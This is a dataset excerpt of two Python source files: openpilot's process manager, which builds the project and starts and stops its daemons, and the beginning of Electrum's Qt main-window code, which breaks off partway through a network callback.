source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict, List
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.swaglog import cloudlog, add_logentries_handler
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
  """Fork into a pty and relay the child's output through a non-blocking stdout.

  The parent forwards SIGINT/SIGTERM to the child, copies everything the child
  writes to the pty onto its own stdout, then exits with the child's exit
  status. The child (return value 0 from forkpty) falls through and runs the
  rest of the program.
  """
  # get a non-blocking stdout
  child_pid, child_pty = os.forkpty()
  if child_pid != 0:  # parent
    # child is in its own process group, manually pass kill signals
    signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
    signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))

    # make our own stdout non-blocking so a stalled consumer can't wedge the relay
    fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)

    while True:
      try:
        dat = os.read(child_pty, 4096)
      except OSError as e:
        if e.errno == errno.EIO:
          # EIO from a pty read means the child side closed (child exited)
          break
        continue

      if not dat:
        break

      try:
        sys.stdout.write(dat.decode('utf8'))
      except (OSError, IOError, UnicodeDecodeError):
        # best-effort relay: drop undecodable/unwritable chunks
        pass

    # os.wait() returns a tuple with the pid and a 16 bit value
    # whose low byte is the signal number and whose high byte is the exit status
    exit_status = os.wait()[1] >> 8
    os._exit(exit_status)
# Fork for stdout relaying before anything else produces output.
if __name__ == "__main__":
  unblock_stdout()

# Run scons
spinner = Spinner()
spinner.update("0")

# When this module is merely imported, don't leave the spinner UI running.
if __name__ != "__main__":
  spinner.close()
def build():
  """Run the scons build, showing progress on the spinner.

  On failure the first attempt cleans the build and caches, then retries once;
  a second failure logs the errors, shows them in a TextWindow, and exits.
  On CI the clean-and-retry step is skipped and failure is immediate.
  """
  for retry in [True, False]:
    # run scons
    env = os.environ.copy()
    env['SCONS_PROGRESS'] = "1"
    env['SCONS_CACHE'] = "1"

    # leave one core free so the UI stays responsive during the build
    nproc = os.cpu_count()
    j_flag = "" if nproc is None else f"-j{nproc - 1}"
    scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)

    compile_output = []

    # Read progress from stderr and update spinner
    while scons.poll() is None:
      try:
        line = scons.stderr.readline()  # type: ignore
        if line is None:
          continue
        line = line.rstrip()

        # scons (with SCONS_PROGRESS=1) emits "progress: <n>" lines on stderr;
        # map node count onto the 0-70% range of the spinner
        prefix = b'progress: '
        if line.startswith(prefix):
          i = int(line[len(prefix):])
          spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
        elif len(line):
          compile_output.append(line)
          print(line.decode('utf8', 'replace'))
      except Exception:
        pass

    if scons.returncode != 0:
      # Read remaining output
      r = scons.stderr.read().split(b'\n')  # type: ignore
      compile_output += r

      if retry:
        if not os.getenv("CI"):
          print("scons build failed, cleaning in")
          for i in range(3, -1, -1):
            print("....%d" % i)
            time.sleep(1)
          subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
          shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
          shutil.rmtree("/data/scons_cache", ignore_errors=True)
        else:
          # on CI there is no point retrying; fail fast
          print("scons build failed after retry")
          sys.exit(1)
      else:
        # Build failed log errors
        errors = [line.decode('utf8', 'replace') for line in compile_output
                  if any([err in line for err in [b'error: ', b'not found, needed by target']])]
        error_s = "\n".join(errors)
        add_logentries_handler(cloudlog)
        cloudlog.error("scons build failed\n" + error_s)

        # Show TextWindow
        spinner.close()
        error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
        with TextWindow("openpilot failed to build\n \n" + error_s) as t:
          t.wait_for_exit()
        exit(1)
    else:
      break
# Build before the imports below, which depend on build products; skipped on
# prebuilt releases (BASEDIR contains a 'prebuilt' marker file).
if __name__ == "__main__" and not PREBUILT:
  build()
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
# comment out anything you don't want to run
# Each value is either a python module path (launched via selfdrive.launcher)
# or a (relative directory, argv) tuple for a native executable.
managed_processes = {
  "thermald": "selfdrive.thermald.thermald",
  "uploader": "selfdrive.loggerd.uploader",
  "deleter": "selfdrive.loggerd.deleter",
  "controlsd": "selfdrive.controls.controlsd",
  "plannerd": "selfdrive.controls.plannerd",
  "radard": "selfdrive.controls.radard",
  "dmonitoringd": "selfdrive.monitoring.dmonitoringd",
  "ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
  "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
  "logmessaged": "selfdrive.logmessaged",
  "locationd": "selfdrive.locationd.locationd",
  "tombstoned": "selfdrive.tombstoned",
  "logcatd": ("selfdrive/logcatd", ["./logcatd"]),
  "proclogd": ("selfdrive/proclogd", ["./proclogd"]),
  "boardd": ("selfdrive/boardd", ["./boardd"]),  # not used directly
  "pandad": "selfdrive.pandad",
  "ui": ("selfdrive/ui", ["./ui"]),
  "calibrationd": "selfdrive.locationd.calibrationd",
  "paramsd": "selfdrive.locationd.paramsd",
  "camerad": ("selfdrive/camerad", ["./camerad"]),
  "sensord": ("selfdrive/sensord", ["./sensord"]),
  "clocksd": ("selfdrive/clocksd", ["./clocksd"]),
  "gpsd": ("selfdrive/sensord", ["./gpsd"]),
  "updated": "selfdrive.updated",
  "dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
  "modeld": ("selfdrive/modeld", ["./modeld"]),
  "rtshield": "selfdrive.rtshield",
}

# Detached daemons that outlive the manager: module path + the param name
# holding their persisted pid.
daemon_processes = {
  "manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
# live Process handles for started managed processes, keyed by name
running: Dict[str, Process] = {}

def get_running():
  """Return the name -> Process map of currently started managed processes."""
  return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']

# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []

# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']

# processes started whenever the manager runs (device-only entries added below)
persistent_processes = [
  'thermald',
  'logmessaged',
  'ui',
  'uploader',
  'deleter',
]

if not PC:
  persistent_processes += [
    'updated',
    'logcatd',
    'tombstoned',
    'sensord',
  ]

# processes started when the car starts and stopped when it shuts off
car_started_processes = [
  'controlsd',
  'plannerd',
  'loggerd',
  'radard',
  'calibrationd',
  'paramsd',
  'camerad',
  'modeld',
  'proclogd',
  'locationd',
  'clocksd',
]

# processes kept alive for the offroad driver-camera preview
driver_view_processes = [
  'camerad',
  'dmonitoringd',
  'dmonitoringmodeld'
]

if not PC or WEBCAM:
  car_started_processes += [
    'ubloxd',
    'dmonitoringd',
    'dmonitoringmodeld',
  ]

if EON:
  car_started_processes += [
    'gpsd',
    'rtshield',
  ]
def register_managed_process(name, desc, car_started=False):
  """Register an extra process with the manager.

  `desc` follows the managed_processes convention (module path or
  (dir, argv) tuple). The process is scheduled either with the car-started
  group or the persistent group.
  """
  global managed_processes, car_started_processes, persistent_processes
  managed_processes[name] = desc
  schedule = car_started_processes if car_started else persistent_processes
  schedule.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
  """Replace the current process image with a native executable.

  Runs inside the forked child: chdir to the process directory, make the
  binary executable, then execvp it (this call does not return on success).
  """
  # exec the process
  os.chdir(cwd)

  # because when extracted from pex zips permissions get lost -_-
  os.chmod(pargs[0], 0o700)

  os.execvp(pargs[0], pargs)
def start_managed_process(name):
  """Start a managed process by name; no-op if already running or unknown."""
  if name in running or name not in managed_processes:
    return
  entry = managed_processes[name]
  if isinstance(entry, str):
    # python process: run the module through the common launcher
    cloudlog.info("starting python %s" % entry)
    proc = Process(name=name, target=launcher, args=(entry,))
  else:
    # native process: (relative directory, argv) executed via nativelauncher
    pdir, pargs = entry
    cloudlog.info("starting process %s" % name)
    proc = Process(name=name, target=nativelauncher, args=(pargs, os.path.join(BASEDIR, pdir)))
  running[name] = proc
  proc.start()
def start_daemon_process(name):
  """Start a detached daemon process unless it is already running.

  The daemon's pid is persisted in a param. If that pid is alive and its
  /proc cmdline still mentions the daemon's module, nothing is done;
  otherwise a fresh instance is spawned in its own process group and the
  new pid is stored.
  """
  params = Params()
  proc, pid_param = daemon_processes[name]
  pid = params.get(pid_param, encoding='utf-8')

  if pid is not None:
    try:
      # signal 0: existence/permission check only, nothing is delivered
      os.kill(int(pid), 0)
      with open(f'/proc/{pid}/cmdline') as f:
        if proc in f.read():
          # daemon is running
          return
    except (OSError, FileNotFoundError, ValueError):
      # process is dead, or the stored pid is not a valid integer
      pass

  cloudlog.info("starting daemon %s" % name)
  # subprocess.DEVNULL instead of open('/dev/null', ...): the previous code
  # leaked three file objects on every start
  child = subprocess.Popen(['python', '-m', proc],  # pylint: disable=subprocess-popen-preexec-fn
                           stdin=subprocess.DEVNULL,
                           stdout=subprocess.DEVNULL,
                           stderr=subprocess.DEVNULL,
                           preexec_fn=os.setpgrp)  # detach into its own process group

  params.put(pid_param, str(child.pid))
def prepare_managed_process(p, build=False):
  """Prepare one managed process: pre-import python processes, optionally
  (re)build native ones that have a SConscript.

  On a failed build the target is cleaned and built once more.
  """
  proc = managed_processes[p]
  if isinstance(proc, str):
    # import this python
    cloudlog.info("preimporting %s" % proc)
    importlib.import_module(proc)
  elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
    # build this process
    cloudlog.info("building %s" % (proc,))
    try:
      # fix: the flag was previously "u" (missing dash), which scons would
      # treat as a target name instead of "search up for the SConstruct root"
      subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
    except subprocess.CalledProcessError:
      # clean and retry if the build failed
      cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
      subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
      subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
  """Wait up to `timeout` seconds for `process` to exit, polling its exitcode.

  Process.join(timeout) can hang due to a python 3 bug
  (https://bugs.python.org/issue28382), so we poll instead.
  """
  deadline = time.time() + timeout
  while process.exitcode is None and time.time() < deadline:
    time.sleep(0.001)
def kill_managed_process(name):
  """Stop a managed process and remove it from `running`.

  Escalation: the process's preferred signal (SIGINT / SIGKILL / SIGTERM),
  then after 5s a SIGKILL — except for `unkillable_processes`, which get 15
  more seconds and then trigger a device reboot (SIGKILL on those risks
  kernel page table corruption, see comment at the list definition).
  """
  if name not in running or name not in managed_processes:
    return
  cloudlog.info("killing %s" % name)

  if running[name].exitcode is None:
    # first pass: the process's preferred termination signal
    if name in interrupt_processes:
      os.kill(running[name].pid, signal.SIGINT)
    elif name in kill_processes:
      os.kill(running[name].pid, signal.SIGKILL)
    else:
      running[name].terminate()

    join_process(running[name], 5)

    if running[name].exitcode is None:
      if name in unkillable_processes:
        cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
        join_process(running[name], 15)
        if running[name].exitcode is None:
          # last resort: record the event and reboot the whole device
          cloudlog.critical("unkillable process %s failed to die!" % name)
          os.system("date >> /data/unkillable_reboot")
          os.sync()
          HARDWARE.reboot()
          raise RuntimeError
      else:
        cloudlog.info("killing %s with SIGKILL" % name)
        os.kill(running[name].pid, signal.SIGKILL)
        running[name].join()

  cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
  del running[name]
def cleanup_all_processes(signal, frame):
  """Kill every managed process; usable directly as a signal handler.

  NOTE(review): the `signal` parameter shadows the `signal` module inside
  this function — harmless here since the module isn't used in the body,
  but worth keeping in mind when editing.
  """
  cloudlog.info("caught ctrl-c %s %s" % (signal, frame))

  if EON:
    pm_apply_packages('disable')

  # iterate over a snapshot: kill_managed_process mutates `running`
  for name in list(running.keys()):
    kill_managed_process(name)
  cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
  """Forward `sig` to a managed process that is known and still alive."""
  proc = running.get(name)
  if proc is None or name not in managed_processes or proc.exitcode is not None:
    return
  cloudlog.info(f"sending signal {sig} to {name}")
  os.kill(proc.pid, sig)
# ****************** run loop ******************
def manager_init():
  """One-time setup before the run loop: msgq dir, server registration,
  logging/crash identity, log directory, and (on EON) apk-readable perms.

  Raises if registration with the server fails (no dongle id).
  """
  # Create folders needed for msgq
  try:
    os.mkdir("/dev/shm")
  except FileExistsError:
    pass
  except PermissionError:
    print("WARNING: failed to make /dev/shm")

  # set dongle id
  reg_res = register()
  if reg_res:
    dongle_id = reg_res
  else:
    raise Exception("server registration failed")
  os.environ['DONGLE_ID'] = dongle_id

  if not dirty:
    os.environ['CLEAN'] = '1'

  # tag all cloud logs and crash reports with this device/build identity
  cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
  crash.bind_user(id=dongle_id)
  crash.bind_extra(version=version, dirty=dirty, is_eon=True)

  os.umask(0)
  try:
    os.mkdir(ROOT, 0o777)
  except OSError:
    pass

  # ensure shared libraries are readable by apks
  if EON:
    os.chmod(BASEDIR, 0o755)
    os.chmod("/dev/shm", 0o777)
    os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
    os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
  """Main manager loop.

  Starts daemon/persistent processes, then drives the car-started and
  driver-view process groups from the `thermal` socket's `started` flag.
  Returns when the DoUninstall param is set.
  """
  cloudlog.info("manager start")
  cloudlog.info({"environ": os.environ})

  # save boot log
  subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))

  # start daemon processes
  for p in daemon_processes:
    start_daemon_process(p)

  # start persistent processes
  for p in persistent_processes:
    start_managed_process(p)

  # start offroad
  if EON:
    pm_apply_packages('enable')
    start_offroad()

  if os.getenv("NOBOARD") is None:
    start_managed_process("pandad")

  # BLOCK env var: comma-separated process names to exclude entirely
  if os.getenv("BLOCK") is not None:
    for k in os.getenv("BLOCK").split(","):
      del managed_processes[k]

  started_prev = False
  logger_dead = False
  params = Params()
  thermal_sock = messaging.sub_sock('thermal')

  while 1:
    msg = messaging.recv_sock(thermal_sock, wait=True)

    # stop logging when disk space drops below 5%
    if msg.thermal.freeSpace < 0.05:
      logger_dead = True

    if msg.thermal.started:
      for p in car_started_processes:
        if p == "loggerd" and logger_dead:
          kill_managed_process(p)
        else:
          start_managed_process(p)
    else:
      logger_dead = False
      driver_view = params.get("IsDriverViewEnabled") == b"1"

      # TODO: refactor how manager manages processes
      # reversed so dependents are stopped before their producers
      for p in reversed(car_started_processes):
        if p not in driver_view_processes or not driver_view:
          kill_managed_process(p)

      for p in driver_view_processes:
        if driver_view:
          start_managed_process(p)
        else:
          kill_managed_process(p)

      # trigger an update after going offroad
      if started_prev:
        os.sync()
        send_managed_process_signal("updated", signal.SIGHUP)

    started_prev = msg.thermal.started

    # check the status of all processes, did any of them die?
    # (green = alive, red = dead, via ANSI color codes)
    running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
    cloudlog.debug(' '.join(running_list))

    # Exit main loop when uninstall is needed
    if params.get("DoUninstall", encoding='utf8') == "1":
      break
def manager_prepare():
  """Prepare every managed process, advancing the spinner toward 100%.

  The build phase already used 0-70%, so the spinner runs 70->100 here
  (0->100 on prebuilt releases where there was no build phase).
  """
  # build all processes
  os.chdir(os.path.dirname(os.path.abspath(__file__)))

  # Spinner has to start from 70 here
  span = 100.0 if PREBUILT else 30.0
  base = 100.0 - span
  count = len(managed_processes)
  for idx, proc_name in enumerate(managed_processes, start=1):
    spinner.update(str(int(base + span * idx / count)))
    prepare_managed_process(proc_name)
def main():
  """Entry point: seed default params, init, prepare, then run the manager
  loop, always cleaning up child processes on the way out.

  Environment knobs: PASSIVE sets the Passive param; PREPAREONLY exits after
  preparation (used for CI/packaging).
  """
  params = Params()
  params.manager_start()

  # default params written only if currently unset
  default_params = [
    ("CommunityFeaturesToggle", "0"),
    ("CompletedTrainingVersion", "0"),
    ("IsRHD", "0"),
    ("IsMetric", "0"),
    ("RecordFront", "0"),
    ("HasAcceptedTerms", "0"),
    ("HasCompletedSetup", "0"),
    ("IsUploadRawEnabled", "1"),
    ("IsLdwEnabled", "1"),
    ("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
    ("OpenpilotEnabledToggle", "1"),
    ("LaneChangeEnabled", "1"),
    ("IsDriverViewEnabled", "0"),
  ]

  # set unset params
  for k, v in default_params:
    if params.get(k) is None:
      params.put(k, v)

  # is this dashcam?
  if os.getenv("PASSIVE") is not None:
    params.put("Passive", str(int(os.getenv("PASSIVE"))))

  if params.get("Passive") is None:
    raise Exception("Passive must be set to continue")

  if EON:
    update_apks()

  manager_init()
  manager_prepare()
  spinner.close()

  if os.getenv("PREPAREONLY") is not None:
    return

  # SystemExit on sigterm
  signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))

  try:
    manager_thread()
  except Exception:
    traceback.print_exc()
    crash.capture_exception()
  finally:
    # always reap children, even on crash or SIGTERM
    cleanup_all_processes(None, None)

  if params.get("DoUninstall", encoding='utf8') == "1":
    cloudlog.warning("uninstalling")
    HARDWARE.uninstall()
if __name__ == "__main__":
  try:
    main()
  except Exception:
    # startup failure: log it and surface it on the device screen
    add_logentries_handler(cloudlog)
    cloudlog.exception("Manager failed to start")

    # Show last 3 lines of traceback
    error = traceback.format_exc(-3)
    error = "Manager failed to start\n\n" + error

    spinner.close()
    with TextWindow(error) as t:
      t.wait_for_exit()

    raise

  # manual exit because we are forked
  sys.exit(0)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import *
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import Multisig_Wallet, CannotBumpFee, Abstract_Wallet
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .installwizard import WIF_HELP_TEXT
class StatusBarButton(QPushButton):
    """Small flat icon button for the status bar; triggers on click or Return."""

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.func = func
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.setIconSize(QSize(25, 25))
        self.clicked.connect(self.onPress)

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, event):
        if event.key() == Qt.Key_Return:
            self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
    def __init__(self, gui_object, wallet: Abstract_Wallet):
        """Build the main wallet window: state, tabs, menus, shortcuts,
        and network callback wiring, then load the wallet."""
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        self.wallet = wallet
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.invoices = wallet.invoices
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        # misc window state flags
        self.cleaned_up = False
        self.is_max = False
        self.payment_request = None
        self.checking_accounts = False
        self.qr_window = None
        self.not_enough_funds = False
        self.pluginsdialog = None
        self.require_fee_update = False
        self.tl_windows = []
        self.tx_external_keypairs = {}
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0

        self.create_status_bar()
        self.need_update = threading.Event()

        # display unit: fall back to the default if the stored value is unknown
        self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
        try:
            decimal_point_to_base_unit_name(self.decimal_point)
        except UnknownBaseUnit:
            self.decimal_point = DECIMAL_POINT_DEFAULT
        self.num_zeros = int(config.get('num_zeros', 0))

        self.completions = QStringListModel()

        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))

        def add_optional_tab(tabs, tab, icon, description, name):
            # optional tabs remember their metadata so toggle_tab can
            # re-insert them at the right position later
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))

        add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")

        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.setCentralWidget(tabs)

        if self.config.get("is_maximized"):
            self.showMaximized()

        self.setWindowIcon(QIcon(":icons/electrum.png"))
        self.init_menubar()

        # weakref proxy so the shortcut lambdas don't keep the tabs alive
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))

        for i in range(wrtabs.count()):
            # i=i binds the loop variable at definition time (late-binding fix)
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))

        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.history_list.setFocus(True)

        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            self.network.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
            self.network.register_callback(self.on_quotes, ['on_quotes'])
            self.network.register_callback(self.on_history, ['on_history'])
            self.new_fx_quotes_signal.connect(self.on_fx_quotes)
            self.new_fx_history_signal.connect(self.on_fx_history)

        # update fee slider in case we missed the callback
        self.fee_slider.update()
        self.load_wallet(wallet)
        self.connect_slots(gui_object.timer)
        self.fetch_alias()
    def on_history(self, b):
        # network-thread callback; re-emit as a Qt signal to hop to the GUI thread
        self.new_fx_history_signal.emit()
    def setup_exception_hook(self):
        # install the crash-reporter excepthook for this window
        Exception_Hook(self)
    def on_fx_history(self):
        """GUI-thread handler for new fiat exchange-rate history."""
        self.history_list.refresh_headers()
        self.history_list.update()
        self.address_list.update()
    def on_quotes(self, b):
        # network-thread callback; re-emit as a Qt signal to hop to the GUI thread
        self.new_fx_quotes_signal.emit()
    def on_fx_quotes(self):
        """GUI-thread handler for new fiat quotes: refresh status and amount edits."""
        self.update_status()
        # Refresh edits with the new rate
        edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
        edit.textEdited.emit(edit.text())
        edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
        edit.textEdited.emit(edit.text())
        # History tab needs updating if it used spot
        if self.fx.history_used_spot:
            self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented. This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        self.tl_windows.append(window)
    def pop_top_level_window(self, window):
        # counterpart to push_top_level_window; raises ValueError if absent
        self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
    def diagnostic_name(self):
        # log prefix: "<class diagnostic name>/<wallet basename>"
        return "%s/%s" % (PrintError.diagnostic_name(self),
                          self.wallet.basename() if self.wallet else "None")
    def is_hidden(self):
        # minimized counts as hidden for tray toggle purposes
        return self.isMinimized() or self.isHidden()
    def show_or_hide(self):
        """Toggle window visibility (used by the tray icon)."""
        if self.is_hidden():
            self.bring_to_top()
        else:
            self.hide()
    def bring_to_top(self):
        """Un-hide the window and raise it above other windows."""
        self.show()
        self.raise_()
    def on_error(self, exc_info):
        """Task-thread error callback: print the traceback and show a popup.

        UserCancelled is deliberately silent — the user aborted on purpose.
        """
        if not isinstance(exc_info[1], UserCancelled):
            try:
                traceback.print_exception(*exc_info)
            except OSError:
                pass  # see #4418; try to at least show popup:
            self.show_error(str(exc_info[1]))
    def on_network(self, event, *args):
        """Network-thread callback: handle cheap events directly, marshal the
        rest to the GUI thread via network_signal."""
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
